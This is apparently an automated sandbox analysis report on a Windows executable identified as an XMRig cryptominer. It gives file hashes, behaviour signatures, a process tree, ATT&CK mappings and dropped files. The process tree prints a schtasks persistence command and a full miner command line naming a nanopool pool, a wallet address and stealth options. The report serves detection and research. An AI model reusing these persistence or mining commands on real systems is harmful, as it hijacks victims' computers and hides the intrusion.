Analysis

  • max time kernel
    137s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    23-07-2021 19:07

General

  • Target

    eb9f90fdaf8f78ff76132098d17fd0bd.exe

  • Size

    45KB

  • MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

  • SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

  • SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

  • SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe
    "C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:528
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:384
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:904
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:1220
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos --pass= --cpu-max-threads-hint=50 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1432

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • \Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • memory/368-63-0x0000000000000000-mapping.dmp
  • memory/384-73-0x0000000000000000-mapping.dmp
  • memory/528-64-0x0000000000000000-mapping.dmp
  • memory/840-66-0x0000000000000000-mapping.dmp
  • memory/840-69-0x000000013F420000-0x000000013F421000-memory.dmp
    Filesize

    4KB

  • memory/840-72-0x000000001BC50000-0x000000001BC52000-memory.dmp
    Filesize

    8KB

  • memory/904-74-0x0000000000000000-mapping.dmp
  • memory/1096-59-0x000000013F360000-0x000000013F361000-memory.dmp
    Filesize

    4KB

  • memory/1096-62-0x00000000009C0000-0x00000000009C2000-memory.dmp
    Filesize

    8KB

  • memory/1096-61-0x0000000000160000-0x0000000000169000-memory.dmp
    Filesize

    36KB

  • memory/1220-76-0x0000000000000000-mapping.dmp
  • memory/1220-79-0x000000013F580000-0x000000013F581000-memory.dmp
    Filesize

    4KB

  • memory/1220-81-0x000000001BA60000-0x000000001BA62000-memory.dmp
    Filesize

    8KB

  • memory/1432-82-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1432-83-0x00000001402EB66C-mapping.dmp
  • memory/1432-84-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1432-85-0x0000000000170000-0x0000000000190000-memory.dmp
    Filesize

    128KB

  • memory/1432-86-0x00000000001C0000-0x00000000001E0000-memory.dmp
    Filesize

    128KB

  • memory/1432-87-0x00000000001C0000-0x00000000001E0000-memory.dmp
    Filesize

    128KB

  • memory/1432-88-0x00000000001E0000-0x0000000000200000-memory.dmp
    Filesize

    128KB